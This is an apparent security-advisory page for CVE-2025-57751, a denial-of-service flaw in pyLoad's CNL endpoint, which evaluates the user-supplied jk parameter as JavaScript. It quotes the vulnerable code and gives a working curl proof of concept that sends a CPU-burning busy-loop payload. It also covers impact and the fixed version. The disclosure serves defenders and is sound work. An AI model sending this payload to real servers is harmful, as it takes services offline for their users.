CVE-2025-57751: Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs

Published Aug 21, 2025
·
Updated

Dear Maintainers, I am writing to you on behalf of the Tencent AI Sec. We have identified a potential vulnerability in one of your products and would like to report it to you for further investigation and mitigation.

Summary The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive.

Details - Endpoint: flash/addcrypted2 - affected file: https://github.com/pyload/pyload/blob/develop/src/pyload/webui/app/blueprints/cnlblueprint.py#L123 https://github.com/pyload/pyload/blob/develop/src/pyload/core/utils/misc.py#L42

affected code python @bp.route("/flash/addcrypted2", methods=["POST"], endpoint="addcrypted2") @localcheck def addcrypted2(): package = flask.request.form.get( "package", flask.request.form.get("source", flask.request.form.get("referer")) ) crypted = flask.request.form["crypted"] jk = flask.request.form["jk"] packpassword = flask.request.form.get("passwords")

crypted = standardb64decode(unquote(crypted.replace(" ", "+"))) jk = evaljs(f"{jk} f()")

python def evaljs(script, es6=False): if sys.versioninfo < (3, 12): return (js2py.evaljs6 if es6 else js2py.evaljs)(script) else: return dukpy.evaljs(script)

PoC download pyload and run locally, send the following request - PoC shell curl -X POST "http://localhost:8000/flash/addcrypted2" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "crypted=SGVsbG8gd29ybGQ=" \ -d "passwords=pyload" \ -d "jk=const start = Date.now();%0Awhile (Date.now() - start < 30000) {} //" The 30000 can be modified to any large value.

Impact System resources are exhausted, causing services to be temporarily interrupted or stopped, making them inaccessible to normal users.

Use the following command to check CPU usage shell top -pid $(pgrep -f "pyload.main") or shell top -pid $(pgrep -f "pyload")

The CPU is fully occupied <img width="1209" height="134" alt="image" src="https://github.com/user-attachments/assets/5f9338fe-90c8-4e99-bd8e-a5b5c5a81a6e" />

web-ui unresponsive <img width="1209" height="496" alt="image" src="https://github.com/user-attachments/assets/7100cdb6-e4d5-4d0c-a138-51b08a7b1fbd" />

Other sources

pyLoad is the free and open-source Download Manager written in pure Python. The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive. This vulnerability is fixed in 0.5.0b3.dev92.

— MITRE

Affected Software

2 affected componentsFixes available
pyload pyload<0.5.0b3.dev92
pip/pyload-ng<0.5.0b3.dev92
0.5.0b3.dev92

Event History

Aug 21, 2025
CVE Published
via MITRE·06:27 PM
Data Sourced
via MITRE·06:27 PM
DescriptionWeakness
Data Sourced
via NVD·07:15 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·08:11 PM
Data Sourced
via GitHub·08:11 PM
DescriptionWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-57751?

CVE-2025-57751 has a high severity level due to its potential to cause significant resource exhaustion on affected systems.

2

How do I fix CVE-2025-57751?

To mitigate CVE-2025-57751, the recommendation is to update pyLoad to a version beyond 0.5.0b3.dev92 where the issue is patched.

3

What are the consequences of CVE-2025-57751?

Exploitation of CVE-2025-57751 can lead to server CPU exhaustion, which may impact the availability of services running on the affected server.

4

Which versions of pyLoad are affected by CVE-2025-57751?

CVE-2025-57751 affects all versions of pyLoad prior to 0.5.0b3.dev92.

5

Is CVE-2025-57751 remotely exploitable?

Yes, CVE-2025-57751 can be exploited remotely due to lack of input validation in the jk parameter.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203